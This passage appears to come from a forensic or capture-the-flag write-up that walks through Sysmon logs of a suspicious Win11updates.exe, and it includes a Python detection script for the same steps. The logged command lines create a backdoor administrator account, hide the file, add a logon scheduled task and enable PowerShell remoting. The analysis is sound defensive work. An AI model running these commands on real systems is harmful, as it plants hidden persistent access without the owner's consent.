</span><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>As expected, the "<i>net.exe</i>" command spawns "<i>net1.exe</i>" to create the user:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.354 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a500-000000003100} </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span>ProcessId 7840 </span>
<span> Image C:\Windows\System32\net1.exe </span></b></span>
<span style="color: white;"> FileVersion 10.0.22621.674 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Net Command </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName net1.exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\net1 user LittleNewman password /add </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=CBF31BACECC4B17A1FE2D65BDC53F111,SHA256=1879DB2ABFF726A5438DD1AE48F20EBED736619C27A32526D09F70AF7EADD0E5,IMPHASH=76EE66A0F294EAB08DCAEF5E64FBF02F </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38f-64bd-a400-000000003100} </span>
<span style="color: white;"> ParentProcessId 4416 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\net.exe </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>ParentCommandLine net user LittleNewman password /add </b></span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We then see the "<i>attrib.exe</i>" command being executed to hide the file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.370 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a600-000000003100} </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> ProcessId 7860 </span></b></span><b><span style="color: #fcff01;">
<span> Image C:\Windows\System32\attrib.exe </span></span></b>
<span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Attribute Utility </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName ATTRIB.EXE </span>
<b><span style="color: #fcff01;"><span> CommandLine attrib +h C:/Users/Public/Win11updates.exe </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=A243BC9DB0BFB5F22E146B88BB10C58F,SHA256=0758152947F1A550E52CE8E3F9BCD988A23D36A458AD953795769B11C38FF2EA,IMPHASH=2CB38FE7D8F223D9DA50B7CBA9B95A6D </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38f-64bd-a200-000000003100} </span>
<span style="color: white;"> ParentProcessId 5832 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\cmd.exe </span>
<span style="color: #fcff01;"><b><span> ParentCommandLine C:\Windows\system32\cmd.exe /c "attrib +h C:/Users/Public/Win11updates.exe" </span>
</b></span><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div>Like any good threat actor, one or more persistence mechanisms had to be created. We see the backdoor user being created above. Now we see a scheduled task (my favourite persistence mechanism) being created to run the "<i>Win11updates.exe</i>" file whenever Jerry logs on. While the task's target is "<i>C:/Users/Public/Win11updates.exe</i>", we see that Jerry is still working out of the "E:\" drive. I like the choice of name for this scheduled task: "<i>WindowsImportant</i>".</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.417 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a700-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 7732 </span>
<span> Image C:\Windows\System32\cmd.exe </span></b></span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\cmd.exe /c "schtasks /create /tn "WindowsImportant" /tr "C:/Users/Public/Win11updates.exe" /sc ONLOGON /ru "Jerry"" </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: #fcff01;"><b><span> ParentImage E:\Win11updates.exe </span>
</b></span><span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry</span>
</pre></div>
</div><div><br /></div><div><div><i>schtasks.exe</i> is then called as its own process, with <i>cmd.exe</i> as its parent.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.511 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a900-000000003100} </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> ProcessId 7988 </span></b></span><b><span style="color: #fcff01;">
<span> Image C:\Windows\System32\schtasks.exe </span></span></b>
<span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Task Scheduler Configuration Tool </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName schtasks.exe </span>
<span style="color: #fcff01;"><span> CommandLine schtasks /create /tn "WindowsImportant" /tr "C:/Users/Public/Win11updates.exe" /sc ONLOGON /ru "Jerry" </span>
</span><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=D857FA7279E2861199583474C17A1C6C,SHA256=DDDE64F0F55751763C1BCD53DE9CDFFC0D725D45A8476464A2A0422661813004,IMPHASH=44E70F20C235C150D75F6FC8B1E29CD1 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38f-64bd-a700-000000003100} </span>
<span style="color: white;"> ParentProcessId 7732 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\cmd.exe </span>
<b><span style="color: #fcff01;"><span> ParentCommandLine C:\Windows\system32\cmd.exe /c "schtasks /create /tn "WindowsImportant" /tr "C:/Users/Public/Win11updates.exe" /sc ONLOGON /ru "Jerry"" </span>
</span></b><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div>I'm beginning to have serious concerns about Jerry. We see that Jerry is attempting to enable <i>PSRemoting</i>. While <i>PSRemoting</i> is enabled by default on Windows server platforms, the same is not true for client versions. Hence, below, Jerry is deliberately configuring the local computer to receive Powershell remote commands. Ohh, Jerry seems up to no good at this point. Or is this Jean preparing the environment for the challenge :-). It doesn't matter, we're just having fun while learning.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.560 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-aa00-000000003100} </span>
<span style="color: white;"> ProcessId 8028 </span>
<span style="color: white;"> Image C:\Windows\System32\cmd.exe </span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<span style="color: #fcff01;"><b><span> CommandLine C:\Windows\system32\cmd.exe /c "powershell.exe Enable-PSRemoting -Force" </span>
</b></span><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: #fcff01;"><b> ParentImage E:\Win11updates.exe </b></span>
<span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We see Powershell is spawned by <i>cmd.exe</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.593 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-ac00-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 7676 </span>
<span> Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe </span></b></span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows PowerShell </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName PowerShell.EXE </span>
<span style="color: white;"> CommandLine powershell.exe Enable-PSRemoting -Force </span>
<span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=0499440C4B0783266183246E384C6657,SHA256=D436E66C0D092508E4B85290815AB375695FA9013C7423A3A27FED4F1ACF90BD,IMPHASH=342A7FD0A3177AE5549A5EEE99F82271 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38f-64bd-aa00-000000003100} </span>
<span style="color: white;"> ParentProcessId 8028 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\cmd.exe </span>
<b><span style="color: #fcff01;"><span> ParentCommandLine C:\Windows\system32\cmd.exe /c "powershell.exe Enable-PSRemoting -Force" </span>
</span></b><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
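<div><br /></div><div>The chain above (account creation, <i>attrib +h</i>, the scheduled task, <i>Enable-PSRemoting</i>, and the Administrators group addition that follows) is exactly what a detection engineer would want to pull out of these Sysmon records automatically, together with the question raised earlier of whether each step happened before anyone connected remotely. The script below is an added example and not the post's own tooling: it parses Event ID 1 records in the same "Key Value" layout shown here, rebuilds the process lineage from <i>ProcessGuid</i>/<i>ParentProcessGuid</i>, and tags each process with the techniques observed in this walkthrough. The sample records are a trimmed, constructed copy of five events from this page, and the rule labels, the <i>FIRST_REMOTE_CONNECTION</i> cutoff (taken from the time quoted earlier for Newman's first port 5985 connection) and the "unversioned binary at High integrity" heuristic are this example's own choices, not Sysmon's.</div><div><br /></div>

```python
# Added example, not the post's own tooling: parse Sysmon EventData blocks in
# the " Key Value" layout shown above, rebuild the process tree from
# ProcessGuid/ParentProcessGuid, and flag the steps the walkthrough observes.
import re

# Constructed sample: five Event ID 1 records from the walkthrough, trimmed to
# the keys this example reads. The first record's parent is not included.
SAMPLE = r"""
- EventData
 UtcTime 2023-07-23 23:11:09.936
 ProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100}
 Image E:\Win11updates.exe
 FileVersion -
 CommandLine "E:\Win11updates.exe"
 IntegrityLevel High
 ParentProcessGuid {3f0f5ad4-b38d-64bd-9c00-000000003100}
- EventData
 UtcTime 2023-07-23 23:11:10.510
 ProcessGuid {3f0f5ad4-b38e-64bd-9e00-000000003100}
 Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 CommandLine powershell -Command "Start-Process -FilePath \"cmd.exe\" -ArgumentList \"/c net user LittleNewman password /add\" -Verb RunAs"
 ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100}
- EventData
 UtcTime 2023-07-23 23:11:11.181
 ProcessGuid {3f0f5ad4-b38f-64bd-a000-000000003100}
 Image C:\Windows\System32\cmd.exe
 CommandLine "C:\Windows\system32\cmd.exe" /c net user LittleNewman password /add
 ParentProcessGuid {3f0f5ad4-b38e-64bd-9e00-000000003100}
- EventData
 UtcTime 2023-07-23 23:11:11.417
 ProcessGuid {3f0f5ad4-b38f-64bd-a700-000000003100}
 Image C:\Windows\System32\cmd.exe
 CommandLine C:\Windows\system32\cmd.exe /c "schtasks /create /tn "WindowsImportant" /tr "C:/Users/Public/Win11updates.exe" /sc ONLOGON /ru "Jerry""
 ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100}
- EventData
 UtcTime 2023-07-23 23:11:11.560
 ProcessGuid {3f0f5ad4-b38f-64bd-aa00-000000003100}
 Image C:\Windows\System32\cmd.exe
 CommandLine C:\Windows\system32\cmd.exe /c "powershell.exe Enable-PSRemoting -Force"
 ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100}
"""

# Label + regex per technique the post observes, matched case-insensitively
# against CommandLine. net1.exe repeats net.exe's arguments, hence "net1?".
RULES = [
    ("local account created", r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("account added to Administrators", r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    ("file hidden with attrib +h", r"\battrib\s+\+h\b"),
    ("scheduled task persistence", r"\bschtasks\s+/create\b"),
    ("WinRM enabled (Enable-PSRemoting)", r"\benable-psremoting\b"),
]
FIRST_REMOTE_CONNECTION = "2023-07-23 23:13:07.856"  # Newman's first port 5985 hit, per the post

def parse_events(text):
    """EventData blocks -> list of {Key: Value}; Sysmon's "-" (empty) becomes ""."""
    events, current = [], None
    for line in (l.strip() for l in text.splitlines()):
        if line.lstrip("- ").startswith("EventData"):
            current = {}
            events.append(current)
        elif line and current is not None:
            key, _, value = line.partition(" ")
            current[key] = "" if value.strip() == "-" else value.strip()
    return events

def classify_commandline(cmdline):
    """Labels of every rule matching the command line (empty list if none)."""
    return [label for label, pat in RULES if re.search(pat, cmdline, re.I)]

def suspicious_image(ev):
    """Triage heuristic, not proof: no version resource, outside C:\\Windows, High integrity."""
    return (not ev.get("Image", "").lower().startswith("c:\\windows\\")
            and ev.get("FileVersion") == "" and ev.get("IntegrityLevel") == "High")

def lineage(events, guid):
    """Image basenames from the oldest ancestor we hold down to `guid`, via ParentProcessGuid."""
    by_guid = {ev["ProcessGuid"]: ev for ev in events if "ProcessGuid" in ev}
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:  # `seen` guards against a reused GUID
        seen.add(guid)
        chain.append(by_guid[guid]["Image"].rsplit("\\", 1)[-1])
        guid = by_guid[guid].get("ParentProcessGuid", "")
    return chain[::-1]

def findings(events, cutoff=FIRST_REMOTE_CONNECTION):
    """One finding per process that trips a rule or the image heuristic. `before_cutoff`
    answers the post's question: did it happen before anyone connected remotely?
    (Sysmon UtcTime strings are fixed-width, so plain string comparison orders them.)"""
    out = []
    for ev in events:
        labels = classify_commandline(ev.get("CommandLine", ""))
        if suspicious_image(ev):
            labels.append("unversioned binary at High integrity outside C:\\Windows")
        if labels:
            out.append({"time": ev["UtcTime"], "before_cutoff": ev["UtcTime"] < cutoff,
                        "lineage": lineage(events, ev["ProcessGuid"]), "labels": labels})
    return out

if __name__ == "__main__":
    for f in findings(parse_events(SAMPLE)):
        print(f["time"], " -> ".join(f["lineage"]), f["labels"],
              "before remote access" if f["before_cutoff"] else "after remote access")
```

<div>Run against the five sample records, every finding is stamped "before remote access", which is the point made earlier: the account creation, the persistence and the WinRM change all predate the first connection on port 5985 and all run under Jerry's own logon. On a real dump the same code would be fed every Event ID 1 record recovered from memory; the lineage function is what turns a flat list of events into the <i>Win11updates.exe -> powershell.exe -> cmd.exe -> net.exe</i> chain walked through by hand above, and a process whose ancestry includes an unversioned binary on a removable drive deserves attention even when its own command line looks ordinary.</div>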
</div><div><br /></div><div><div>We see the process <i>WmiPrvSE.exe</i>, which is associated with Windows Management Instrumentation (WMI), here resolving the local host name <i>JERRY-PC</i>. I believe this is also used by PSRemoting.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:15.310 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38a-64bd-9800-000000003100} </span>
<span style="color: white;"> ProcessId 3140 </span>
<span style="color: white;"> QueryName JERRY-PC </span>
<span style="color: white;"> QueryStatus 0 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span> QueryResults ::1;::ffff:10.240.240.4; </span>
<span> Image C:\Windows\System32\wbem\WmiPrvSE.exe </span></b></span>
<span style="color: white;"> User NT AUTHORITY\NETWORK SERVICE </span>
</pre></div>
</div><div><br /></div><div><div>We now see the previously created user "<i>LittleNewman</i>" being placed inside of the "<i>administrators</i>" group on the local computer.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:17.201 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b395-64bd-ad00-000000003100} </span>
<span style="color: #fcff01;"><span> ProcessId 6340 </span>
<span> Image C:\Windows\System32\cmd.exe</span></span><span style="color: white;"> </span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\cmd.exe /c "net localgroup Administrators LittleNewman /add" </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: white;"> ParentImage E:\Win11updates.exe </span>
<span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>As expected, <i>net </i>is called via <i>cmd.exe</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:17.236 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b395-64bd-af00-000000003100} </span>
<span style="color: white;"> ProcessId 8144 </span>
<span style="color: #fcff01;"><b><span> Image C:\Windows\System32\net.exe </span>
</b></span><span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Net Command </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName net.exe </span>
<span style="color: #fcff01;"><span> CommandLine net localgroup Administrators LittleNewman /add </span>
</span><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=BB1AE49B6B7C53499E94613761A6AC56,SHA256=AFBE51517092256504F797F6A5ABC02515A09D603E8C046AE31D7D7855568E91,IMPHASH=D45C37A5C97135204AD6E116C34946C3 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b395-64bd-ad00-000000003100} </span>
<span style="color: white;"> ParentProcessId 6340 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\cmd.exe </span>
<b><span style="color: #fcff01;"><span> ParentCommandLine C:\Windows\system32\cmd.exe /c "net localgroup Administrators LittleNewman /add" </span>
</span></b><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>Then <i>net1.exe</i> is spawned by <i>net.exe</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:17.250 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b395-64bd-b000-000000003100} </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> ProcessId 2480 </span></b></span><b><span style="color: #fcff01;">
<span> Image C:\Windows\System32\net1.exe </span></span></b>
<span style="color: white;"> FileVersion 10.0.22621.674 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Net Command </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName net1.exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\net1 localgroup Administrators LittleNewman /add </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=CBF31BACECC4B17A1FE2D65BDC53F111,SHA256=1879DB2ABFF726A5438DD1AE48F20EBED736619C27A32526D09F70AF7EADD0E5,IMPHASH=76EE66A0F294EAB08DCAEF5E64FBF02F </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b395-64bd-af00-000000003100} </span>
<span style="color: white;"> ParentProcessId 8144 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\net.exe </span>
<span style="color: #fcff01;"><b><span> ParentCommandLine net localgroup Administrators LittleNewman /add </span>
</b></span><span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div><i>LittleNewman</i> is also being added to the "<i>Remote Management Users</i>" group, the group that grants remote access through WinRM.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:17.275 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b395-64bd-b100-000000003100} </span>
<span style="color: white;"> ProcessId 2500 </span>
<span style="color: white;"> Image C:\Windows\System32\cmd.exe </span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows Command Processor </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName Cmd.Exe </span>
<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\cmd.exe /c "net localgroup "Remote Management Users" LittleNewman /add" </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: white;"> ParentImage E:\Win11updates.exe </span>
<span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
